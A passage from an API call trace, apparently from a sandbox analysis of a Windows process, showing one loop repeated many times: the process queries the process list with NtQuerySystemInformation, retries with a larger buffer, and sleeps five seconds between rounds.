returned 0x0 [0230.313] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.317] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.318] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.320] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.320] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.321] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.321] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.324] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.325] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.327] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.327] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.328] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.332] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.332] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.334] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.334] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.334] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.335] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.335] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.339] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.346] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.348] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.349] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.349] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.350] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.350] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.354] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.355] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.356] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.356] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.357] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.357] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.357] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.361] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.362] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.364] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.364] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.364] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.365] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.365] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.369] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.370] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.371] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.372] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.372] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.372] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.376] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.376] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.378] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.378] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.379] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.379] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.379] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.383] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.383] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.386] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.386] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.386] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.387] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.387] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.390] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.391] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.392] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.392] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.393] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.393] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.393] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.396] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.397] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.399] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.399] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.400] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.400] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.400] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.403] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.404] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.406] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.406] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.406] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.407] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.407] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.410] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.411] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.413] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.413] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.413] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.414] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.414] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.417] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.418] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.420] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.420] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.420] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.421] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.421] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.424] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.425] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.426] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.426] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.427] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.427] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.427] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.431] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.431] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.433] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.433] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.433] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.434] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.434] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.440] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.441] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.442] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.443] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.444] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.447] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.448] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.450] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.450] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.451] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.451] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.451] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.455] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.458] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.460] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.461] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.461] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.462] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.465] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.466] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.468] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.469] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.469] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.470] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.470] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.473] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.474] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.476] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, 